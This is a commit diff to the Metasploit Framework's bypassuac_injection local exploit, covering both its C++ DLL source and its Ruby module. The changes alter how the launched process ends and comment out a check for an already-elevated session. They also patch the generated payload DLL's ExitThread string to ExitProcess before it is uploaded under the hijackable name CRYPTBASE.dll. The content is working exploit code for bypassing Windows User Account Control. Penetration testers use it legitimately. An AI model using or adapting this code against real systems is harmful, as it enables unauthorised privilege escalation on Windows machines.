Use ExitProcess

external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp

@@ -85,8 +85,6 @@ void exploit()
 								Wow64DisableWow64FsRedirection(&OldValue);
 								if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
 								{
-									WaitForSingleObject(shinfo.hProcess, 200);
-									TerminateProcess(shinfo.hProcess, 0); // Even better if the template payload.dll calls ExitProcess
 									CloseHandle(shinfo.hProcess);
 								}
 								Wow64RevertWow64FsRedirection(OldValue);

modules/exploits/windows/local/bypassuac_injection.rb

@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -64,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   def exploit
 
-    fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
+    #fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
 
     #
     # Verify use against Vista+
@@ -154,6 +152,11 @@ class Metasploit3 < Msf::Exploit::Local
     # Generate payload and random names for upload
     #
     payload = generate_payload_dll
+    # Change ExitThread to ExitProcess ...
+    exit_thread = "\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00"
+    exit_process = "\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73"
+    index =  payload.index(exit_thread)
+    payload[index,exit_process.length] = exit_process
     payload_filepath = "#{tmpdir}\\CRYPTBASE.dll"
 
     print_status("Uploading the Payload DLL to the filesystem...")